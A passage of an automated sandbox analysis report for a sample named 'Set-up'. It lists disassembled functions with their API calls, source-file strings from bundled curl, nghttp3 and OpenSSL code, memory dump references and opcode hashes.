                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: htonsmemcpystrlen
                          • String ID: curl_addrinfo.c
                          • API String ID: 2973076469-1838508774
                          • Opcode ID: a395774d92dbe5fd0d4bfd0256d736060bfd106845dbc6e3fb0c3600441cd947
                          • Instruction ID: a52b0d8ce80d5acc8a804ae57eb850770b374cd2076f61fb694037decb48662c
                          • Opcode Fuzzy Hash: a395774d92dbe5fd0d4bfd0256d736060bfd106845dbc6e3fb0c3600441cd947
                          • Instruction Fuzzy Hash: C3418AB5A04705AFD7009F55C481A2AB7E4FF88314F04892AFD898B291E370E950DBA1
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00A9665D
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A9670E
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 00A9671C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_time64
                          • String ID: altsvc.c
                          • API String ID: 2413861649-3234676706
                          • Opcode ID: c0e149306e92bf12e89616e9ace2010d1321082bffb22e361ac03f28e2045d7e
                          • Instruction ID: 62d3182f5fcd16547d1b49378d132a59bcfa51ec0b98b665576cb8685b3f553c
                          • Opcode Fuzzy Hash: c0e149306e92bf12e89616e9ace2010d1321082bffb22e361ac03f28e2045d7e
                          • Instruction Fuzzy Hash: 8031C4F1B183006BDB10AF64AD82A2F77F4AF94758F044438FE0D9A242F675ED44C6A2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00B0435F
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 00B043EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                          • API String ID: 1222420520-4133914617
                          • Opcode ID: 7be0b9d3330e1f175876dc368a3f5a995e159c839b579eb071d2b8db6c46c283
                          • Instruction ID: 3d32b622b768a007ed663eab3852b004fb7dcde967225c799aa4f06970186dde
                          • Opcode Fuzzy Hash: 7be0b9d3330e1f175876dc368a3f5a995e159c839b579eb071d2b8db6c46c283
                          • Instruction Fuzzy Hash: E531B472500205AFD7119F54EC0AFDA3BE9EF85319F0904F4EA049B1A3E772E928C7A5
                          APIs
                          • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,00B070DF,00000001,?,?,?), ref: 00B0A0E5
                            • Part of subcall function 00B0A140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00B0A29A
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,00B070DF,00000001,?,?,?), ref: 00B0A135
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assertmemcpymemmove
                          • String ID: ksl->head$nghttp3_ksl.c
                          • API String ID: 374949274-2784241221
                          • Opcode ID: 58e793d7afa27151e41d0c32a8039b0f5dd68ebcf9fba4676c56aee14a05e7a3
                          • Instruction ID: a63a3f1a9fcf8c26fec2523f679a0011773520c8863b69df99fa0ca502dadef1
                          • Opcode Fuzzy Hash: 58e793d7afa27151e41d0c32a8039b0f5dd68ebcf9fba4676c56aee14a05e7a3
                          • Instruction Fuzzy Hash: DD1190702003049FDB149F04D98196AFFE6FF8A314F18C99EE9499B686D334EC41DBA2
                          APIs
                          • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00A9893B
                          • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00A98960
                            • Part of subcall function 00A87620: GetModuleHandleA.KERNEL32(ntdll), ref: 00A8763F
                            • Part of subcall function 00A87620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00A8764B
                            • Part of subcall function 00A87620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00A87695
                            • Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 00A876D3
                            • Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 00A876DA
                            • Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 00A876E4
                            • Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00A876EB
                            • Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00A876FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
                          • String ID: @$ @
                          • API String ID: 2103437208-1089145642
                          • Opcode ID: 2da17c09d79a193074a9a2da5ca6a228c2152b0ba43cfd22af70d4105d4b13ac
                          • Instruction ID: 9fd72eabd53b147e41321da7ce7ca27bc3b83e4cc6b5779fe2f57c0f3573c920
                          • Opcode Fuzzy Hash: 2da17c09d79a193074a9a2da5ca6a228c2152b0ba43cfd22af70d4105d4b13ac
                          • Instruction Fuzzy Hash: 48019BB050434257EB109F14F94A77A77D4AF82714F014418F9C45B2C5E7B9CAC8C743
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00A8C685
                            • Part of subcall function 00A673F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00A6CA95,00F9CA98,00000467,mprintf.c), ref: 00A6741D
                            • Part of subcall function 00A673F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00A67445
                            • Part of subcall function 00A673F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00A6CA95,00F9CA98,00000467,mprintf.c), ref: 00A67486
                            • Part of subcall function 00A673F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00A674AA
                            • Part of subcall function 00A673F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A674B2
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00A8C6CF
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00A8C719
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy$__acrt_iob_func_errnofflushstrlen
                          • String ID: vtls/vtls.c
                          • API String ID: 1294796744-169717415
                          • Opcode ID: 7753f4a06bad55c49077a04eed9ce8eb5a493c3465aa801158bc884cc81bdf42
                          • Instruction ID: d2ea8a0c8cb0eb37f736bbade7598d1808b6928e3496bbf9ca1bf51d48cf0695
                          • Opcode Fuzzy Hash: 7753f4a06bad55c49077a04eed9ce8eb5a493c3465aa801158bc884cc81bdf42
                          • Instruction Fuzzy Hash: 78A17EB0B40B029BD720DF2AD985B12B7E8BF04754F084579E948CB682FB75E9509FA0
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 00BEE9A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: $BN_lshift$crypto/bn/bn_shift.c
                          • API String ID: 2221118986-2228461501
                          • Opcode ID: bfafef82e7ed67db5d479bc88d681fbdc706694eb4e54b3c8ec8b1d761f5fe34
                          • Instruction ID: 195958d8be585fa90b3febb598819aaa1a3ca0ffdd8be93a9272267de977ec07
                          • Opcode Fuzzy Hash: bfafef82e7ed67db5d479bc88d681fbdc706694eb4e54b3c8ec8b1d761f5fe34
                          • Instruction Fuzzy Hash: BF71DA75A087149BC715DF2AC88062AF7E1AFDA700F148B2EF9A967392D770EC01CB41
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00C105BF,00000000,00000000,input), ref: 00C64986
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 00C649D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpystrlen
                          • String ID: crypto/property/property_string.c$ossl_property_string
                          • API String ID: 3412268980-3682758481
                          • Opcode ID: 1c7a4d87af13c0ac0469dc304e99f4dfb265bd3b26c922bb4b4579267a8fefc6
                          • Instruction ID: ccd35070e97b367c36af1a16aaea207f4b7118c2f597840a9a2fb546495db4b3
                          • Opcode Fuzzy Hash: 1c7a4d87af13c0ac0469dc304e99f4dfb265bd3b26c922bb4b4579267a8fefc6
                          • Instruction Fuzzy Hash: 9D51F9B6D443157BD6217A65AC43F6B77AC9F11704F080138FD48A7253FA72EA14E392
                          APIs
                          • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00C5662C
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strcpystrlen$memcmp
                          • String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
                          • API String ID: 1653033214-3047229099
                          • Opcode ID: 3747a1fe2b0b60bb5ab3c9ef88858e0d472d3608a063d073964df990f4429c8e
                          • Instruction ID: 6f1cd3367c2cc18c06e8f3c49147184d8ac4943c0b247fde8aed9967a7f72921
                          • Opcode Fuzzy Hash: 3747a1fe2b0b60bb5ab3c9ef88858e0d472d3608a063d073964df990f4429c8e
                          • Instruction Fuzzy Hash: 1C4146B9A4431076E61036716C87F9B31288F5534EF640234FE199B2C3F9659A98A2AB
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 00B28769
                          • SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 00B287D1
                            • Part of subcall function 00B288B0: QueryPerformanceFrequency.KERNEL32(?), ref: 00B288C1
                            • Part of subcall function 00B288B0: QueryPerformanceCounter.KERNEL32(?), ref: 00B288CC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
                          • String ID:
                          • API String ID: 3112449238-0
                          • Opcode ID: 7db85ddf3feb5253f7fcacc9da5ac330d1226dd04ad941be33244229865ffa82
                          • Instruction ID: aac6f5f77c6b705c2cde45b3dabf1a2063a0a377c7040f34434efc5e61dbb6f8
                          • Opcode Fuzzy Hash: 7db85ddf3feb5253f7fcacc9da5ac330d1226dd04ad941be33244229865ffa82
                          • Instruction Fuzzy Hash: 5E3116B2B01221ABEB049A31EC85B6A76E8FF84310F54457CEC19DB1A1EF35ED14C791
                          APIs
                          • GetLastError.KERNEL32(00C17CCC,?,00000000,00C17127,00C17CCC,00000000,00C3CAB7,00A61A70), ref: 00C160E3
                          • SetLastError.KERNEL32(00000000), ref: 00C161A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID: crypto/err/err.c$crypto/err/err_local.h
                          • API String ID: 1452528299-2963546075
                          • Opcode ID: 5d366c95f9992b0de8d5398b27e465024534bab3b6c56959c89c05a54a0acfb0
                          • Instruction ID: f675359294bd723c45f8b7bfb0bfac4cff8f9ff102ebae7907994f9f127b66eb
                          • Opcode Fuzzy Hash: 5d366c95f9992b0de8d5398b27e465024534bab3b6c56959c89c05a54a0acfb0
                          • Instruction Fuzzy Hash: 5C317AB1A8030376F2212E29BC47BE97350FB4270CF044234FA24691E3E7B56964E691
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008,?,00000008,?,?,?,?,?,?,?,00C8066D,?,?,?), ref: 00BF0AAD
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
